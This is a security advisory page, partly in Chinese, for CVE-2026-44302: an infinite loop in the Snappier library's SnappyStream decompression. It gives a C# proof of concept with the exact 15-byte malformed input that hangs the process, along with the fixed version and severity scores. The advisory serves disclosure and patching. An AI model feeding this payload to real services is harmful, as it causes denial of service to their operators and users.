CVE-2026-44302
Snappier has an infinite loop during SnappyStream decompression with malformed framed input
描述
### Summary `Snappier.SnappyStream` enters an uncatchable infinite loop when decompressing a malformed framed-format Snappy stream as small as 15 bytes. ### Details The hang manifests as a userspace busy loop with SnappyStreamDecompressor.Decompress repeatedly calling Crc32CAlgorithm.Append. The exact non-terminating loop in or above Decompress has not been traced further. ### PoC ```csharp using System.IO.Compression; using Snappier; byte[] data = { 0x00, 0x04, 0x00, 0x00, 0x64, 0x4e, 0x6c, 0x71, 0x79, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64 }; using var src = new MemoryStream(data); using var snap = new SnappyStream(src, CompressionMode.Decompress); using var dst = new MemoryStream(); snap.CopyTo(dst); // never returns ``` ### Impact A caller using `SnappyStream` on attacker-controlled bytes can be made to spin forever and burn a thread until the process is killed. `try/catch` around the stream operation can't recover (no exception is thrown).
如何修補 CVE-2026-44302
要修補 CVE-2026-44302,請將受影響套件升級到下列已修補版本。
- —升級至 1.3.1 或更新版本
CVE-2026-44302 正在被利用嗎?
低 — EPSS 為 0.1%,目前沒有觀察到大規模利用活動。
受影響套件(1)
- from 0, < 1.3.1
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |